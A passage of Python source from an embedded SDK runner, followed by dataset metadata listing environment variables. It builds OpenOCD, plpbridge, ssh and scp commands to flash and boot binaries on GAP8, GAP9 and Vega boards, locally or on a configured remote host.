script = self.config.get_str('openocd/script')
image_size = os.path.getsize(image)
gap_tools = os.environ.get('GAP_OPENOCD_TOOLS')
wsl = self.config.get_str('runner/wsl')
if wsl is None:
wsl_image = image
else:
path_header = '\\"//wsl$/' + wsl
path_footer = '\\"'
wsl_image = path_header + image + path_footer
script = os.environ.get('OPENOCD_CHIP_TARGET')
if self.config.get_str('**/chip_family') == 'gap':
if flash.get_str('datasheet/type') == 'spi':
flasher_script = 'gap_flash_raw_spi'
else:
flasher_script = 'gap_flash_raw_hyper'
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -c "script %s; script %s; script tcl/flash_image.tcl; script tcl/jtag_boot.tcl; %s %s %d %s; exit;"' % (openocd, cable, script, flasher_script, image, image_size, gap_tools)
elif self.config.get_str('**/chip/name') == 'vega':
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -f "%s/tcl/flash_image.tcl" -c "vega_flash_raw_hyper %s %d %s; exit;"' % (openocd, cable, script, gap_tools, wsl_image, image_size, gap_tools)
else:
if flash.get_str('datasheet/type') == 'mram':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk-mram.elf'
sector_size = 0x2000
else:
if os.environ.get('BOARD_NAME') == 'gap9_evk':
if self.config.get_str('runner/platform') == 'fpga':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk-fpga.elf'
else:
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_evk.elf'
sector_size = 0x1000
else:
if self.config.get_str('runner/platform') == 'fpga':
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gapuino9.elf'
sector_size = 0x40000
else:
# This is for the variant of socketed gap9mod with atxp032
flasher_binary = gap_tools + '/gap_bins/gap_flasher-gap9_v2.elf'
sector_size = 0x1000
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -f "%s/tcl/flash_image.tcl" -c "gap9_flash_raw %s %d %s 0x%x; exit;"' % (openocd, cable, script, gap_tools, wsl_image, image_size, flasher_binary, sector_size)
print ('Flashing image with command:')
print (cmd)
if os.system(cmd):
return -1
return 0
def exec(self):
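# Boot the binary given by runner/boot-loader, either on a remote host over SSH
# (openocd/remote/enabled) or locally through plpbridge/OpenOCD depending on the chip family.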
if os.environ.get('GAPY_OPENOCD_CABLE') is not None:
self.config.set('openocd/cable', os.environ.get('GAPY_OPENOCD_CABLE'))
openocd = self.config.get_str("openocd/path")
cable = self.config.get_str('openocd/cable')
script = self.config.get_str('openocd/script')
binary = self.config.get_str('runner/boot-loader')
wsl = self.config.get_str('runner/wsl')
if wsl is None:
wsl_bin = binary
else:
path_header = '\\"//wsl$/' + wsl
path_footer = '\\"'
wsl_bin = path_header + binary + path_footer
script = os.environ.get('OPENOCD_CHIP_TARGET')
with open(binary, 'rb') as file:
elffile = ELFFile(file)
entry = elffile.header['e_entry']
if self.config.get_bool("openocd/remote/enabled"):
url = self.config.get_str('openocd/remote/url')
path = self.config.get_str('openocd/remote/path')
cmd = 'ssh %s "mkdir -p %s"' % (url, path)
print ('Creating remote path with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
cmd = 'scp %s %s:%s/test' % (binary, url, path)
print ('Copying binary with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
cmd = 'ssh -t %s "%s -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -c \\"script %s; script %s; load_and_start_binary %s/test 0x%x\\""' % (url, openocd, cable, script, path, entry)
print ('Launching execution with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
return 0
else:
chip_family = self.config.get_str('**/chip_family')
if chip_family == 'vega' and os.environ.get('GAPY_USE_OPENOCD') is None:
cmd = 'plpbridge --chip=vega --verbose 10 --cable=ftdi --binary %s reset load ioloop reqloop start wait' % (binary)
elif os.environ.get('GAP_USE_PLPBRIDGE') is not None:
cmd = 'plpbridge --chip=%s --verbose 10 --cable=%s --binary %s reset load ioloop reqloop start wait' % (os.environ.get('TARGET_NAME'), os.environ.get("PLPBRIDGE_CABLE"), binary)
else:
platform = self.config.get_str('runner/platform')
if chip_family == 'vega' or chip_family == 'gap9_v2':
cmd = '%s -d0 -c "gdb_port disabled; telnet_port disabled; tcl_port disabled" -f "%s" -f "%s" -c "load_and_start_binary %s 0x%x"' % (openocd, cable, script, wsl_bin, entry)
else:
cmd = "%s -d0 -c 'gdb_port disabled; telnet_port disabled; tcl_port disabled' -f %s -f %s -f tcl/jtag_boot_entry.tcl -c 'gap8_jtag_load_binary_and_start \"%s\" elf 0x%x'" % (openocd, cable, script, wsl_bin, entry)
os.chdir(self.config.get_str('gapy/work_dir'))
print ('Launching execution with command:')
print (cmd)
if os.system(cmd) != 0:
return -1
return 0
|
[] |
[] |
[
"GAP_USE_PLPBRIDGE",
"GAPY_USE_OPENOCD",
"OPENOCD_CHIP_TARGET",
"TARGET_NAME",
"GAP_OPENOCD_TOOLS",
"PLPBRIDGE_CABLE",
"BOARD_NAME",
"GAPY_OPENOCD_CABLE"
] |
[]
|
["GAP_USE_PLPBRIDGE", "GAPY_USE_OPENOCD", "OPENOCD_CHIP_TARGET", "TARGET_NAME", "GAP_OPENOCD_TOOLS", "PLPBRIDGE_CABLE", "BOARD_NAME", "GAPY_OPENOCD_CABLE"]
|
python
| 8 | 0 | |